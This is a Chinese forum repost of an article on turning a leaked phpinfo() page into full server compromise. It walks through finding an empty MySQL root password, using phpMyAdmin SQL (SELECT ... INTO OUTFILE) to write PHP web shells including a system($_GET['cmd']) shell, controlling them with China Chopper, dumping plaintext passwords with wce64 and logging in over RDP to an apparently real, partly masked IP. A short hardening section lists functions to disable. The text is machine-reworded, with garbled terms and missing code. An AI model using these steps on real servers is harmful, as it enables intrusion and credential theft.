股票合作私募实力操盘手代客理财保赚不亏帐户托收益翻倍

有资源网yoqq.cn
 
 
查看: 131|回复: 0

PHPInfo()信息泄漏漏洞利用提权及防范

[复制链接]

962

主题

979

帖子

3692

积分

管理员

Rank: 9Rank: 9Rank: 9

积分
3692
发表于 2019-7-31 19:35:34 | 显示全部楼层 |阅读模式
   
原标题:PHPInfo()信息走漏毛病使用提权及防范

                51CTO网+ 首届中国APP创新评比大赛>>

     PHPInfo函数信息泄漏漏洞常发生一些默认的安装包,好比phpstudy等,默认安装完成后,没有实时删除这些提供情况测试的文件,比力常见的为phpinfo.php、1.php和test.php,固然通过phpinfo获取的php环境以及变量等信息,但这些信息的泄露共同一些别的漏洞将有大概导致体系被渗出和提权。

     1.1phpinfo函数

     PHP中提供了PHPInfo()函数,该函数返回 PHP 的全部信息,包罗了 PHP 的编译选项及扩充设置、PHP 版本、服务器信息及环境变量、PHP 环境变量、操纵系统版本信息、路径及环境变量配置、HTTP 标头、及版权宣告等信息。其函数界说如下:

     语法: int phpinfo(void);

     返回值: 整数

     函数种类: PHP 系统功能

     比方新建一个php文件,在此中输入以下内容:

     

     1.2phpinfo信息泄露

     该函数重要用于网站建立过程中测试搭建的PHP环境是否精确,许多网站在测试完毕后并没有及时删除,因此当访问这些测试页面时,会输出服务器的关键信息,这些信息的泄露将导致服务器被渗透的风险。

         
1.3一个有phpinfo泄露渗透的实例
1.分析phpinfo函数暴暴露来的有效信息
从网站phpInfo.php步伐运行的效果中我们可以获取以下有用的信息:
(1)操作系统为Windows2008 Server大概Windows7: Windows NT BNKUMDFI 6.1 build 7601
(2)服务器利用了Apache 2.4,这意味着假如拿到Webshell后99%可以提权乐成,Apache在Windows环境下权限极高,默以为System权限。
(3)网站默认路径:D:/WWW 通过mssql或者mysql直接导入一句话必要知道网站真实路径,这个出来就很好办了。
站长交流-PHPInfo()信息泄漏漏洞利用提权及防范(1)
图1获取有用信息
2.检察泄露文件
对根目次举行访问,如图2所示,发现有mail.rar以及三个文件目录,其中有一个phpMyAdmin,这个是mysql的php管理,有这个只要获取数据库暗码即可导入导出数据,包括导出一句话后门。对其中的压缩文件进行下载,并查看其中的数据库配置文件。
站长交流-PHPInfo()信息泄漏漏洞利用提权及防范(2)
图2查看泄露的其它文件
3.获取数据库口令
在mail文件夹下,发现数据库毗连文件为connect.php文件,打开后获取数据库的用户和密码,数据库用户为root,密码为空。
站长交流-PHPInfo()信息泄漏漏洞利用提权及防范(3)
图3获取数据库用户帐号和密码
4.连接并查看数据库
如图4所示,在欣赏器中打开http://183.***.160.***:5555/phpMyAdmin/,输入刚才获取的帐号,直接登录,登录后可以查看其所有数据库。
站长交流-PHPInfo()信息泄漏漏洞利用提权及防范(4)
图4登录并查看数据库
5.导出一句话后门到服务器
现在导出一句话后门的方法有以下几种:
(1)创建表方式
CREATE TABLE `mysql`.`darkmoon` (`darkmoon1` TEXT NOT NULL ); INSERT INTO `mysql`.`darkmoon` (`darkmoon1` ) VALUES (''); SELECT `darkmoon1` FROM `darkmoon` INTO OUTFILE 'd:/www/exehack.php'; DROP TABLE IF EXISTS `darkmoon`;
上面代码是在mysql数据库中创建darkmoon表,然后参加一个名字为darkmoon1的字段,并在darkmoon1的字段中插入一句话代码,然后从darkmoon1字段内里导出一句话到网站的真实路径“d:/www/exehack.php”,末了就是删除darkmoon这个表,实行结果如图5所示。
站长交流-PHPInfo()信息泄漏漏洞利用提权及防范(5)
图5执行导出一句话sql脚本程序
留意:在使用以上代码时必须选择mysql数据库,并在phpMyAdmin中选择SQL,然后执行以上代码即可。需要修改的地方是网站的真实路径和文件名称“d:/www/exehack.php”
(2)直接导出一句话后门文件
select ''INTO OUTFILE 'd:/www/p.php'
如果表现结果雷同“您的 SQL 语句已成功运行 ( 查询耗费 0.0006 秒 )”表明后门文件天生成功。
(3)直接执行下令权限的shell
select '<?php echo \'\';system($_GET[\'cmd\']); echo \'\'; ?>' INTO OUTFILE 'd:/www/cmd.php' 该方法导出成功后可以直接执行DOS命令,使用方法:www.xxx.com/cmd.php?cmd=(cmd=背面直接执行dos命令),如图6所示。 站长交流-PHPInfo()信息泄漏漏洞利用提权及防范(6) 图6导入可以执行命令的webshell 6.获取webshell 对导出的webshell在网站进行访问测试,如图7所示,如果没有显示错误,则表现可以运行,在中国菜刀一句话后门管理中添加该地点直接获取webshell,如图8所示。 站长交流-PHPInfo()信息泄漏漏洞利用提权及防范(7) 图7测试导出的webshell 站长交流-PHPInfo()信息泄漏漏洞利用提权及防范(8) 图8获取webshell 7.服务器提权 通过中国菜刀队长途终端命令,直接在其中执行命令,如图9所示,可以查看是否开启3389端口,系统当前用户的权限是系统权限,查看当前都有什么用户。上传wce64.exe并执行“wce64 -w”获取当前登录明文密码。 站长交流-PHPInfo()信息泄漏漏洞利用提权及防范(9) 图9执行命令 站长交流-PHPInfo()信息泄漏漏洞利用提权及防范(10) 图10获取系统管理员密码 8.登录3389 在当地打开mstsc.exe直接输入用户名和密码进行登录,如图11所示成功登录该服务器。 站长交流-PHPInfo()信息泄漏漏洞利用提权及防范(11) 图10成功登录该服务器 9.总结 系同一个小小的失误,再加上一些偶尔的因素,就导致一个系统被渗透,并获取了服务器权限,因此phpinfo.php信息泄露不可忽略。phpinfo信息泄露还可以进行跨站攻击,将以下代码生存为1.html. 10.防范方法 (1)通过修改服务器环境内php.ini文件,将“expose_php = On”修改成“expose_php = Off”然后重启php即可。 (2)如果确实需要该测试信息,在测试时使用,测试完毕后将该文件删撤除。 (3)若无需要可以将一些php的伤害函数禁用,打开/etc/php.ini文件,查找到 disable_functions,添加需禁用的以下函数名: phpinfo,eval,passthru,exec,system,chroot,scandir,chgrp,chown,shell_exec,proc_open, proc_get_status,ini_alter,ini_alter,ini_restore,dl,pfsockopen,openlog,syslog,readlink, symlink,popepassthru,stream_socket_server,fsocket,fsockopen 【编辑保举】 【责任编辑:蓝雨泪TEL:(010)68476606】 点赞 0返回搜狐,查看更多                  责任编辑:

有资源网- 版权声明 1、本主题所有言论和图片纯属会员个人意见,与有资源网立场无关。
2、本站所有主题由该帖子作者发表,该帖子作者有资源网享有帖子相关版权。
3、有资源网管理员和版主有权不事先通知发贴者而删除本文。
4、其他单位或个人使用、转载或引用本文时必须同时征得该帖子作者 有资源网的同意。
有资源网是一个网络技术交流、游戏交流、娱乐休闲的温馨家园.提供网络最新it资讯、热门电影电视剧、破解软件工具下载_技术和娱乐性的综合型大论坛论资源网
回复

使用道具 举报

发表回复

您需要登录后才可以回帖 登录 | 立即注册 微信登录

本版积分规则

快速回复 返回顶部 返回列表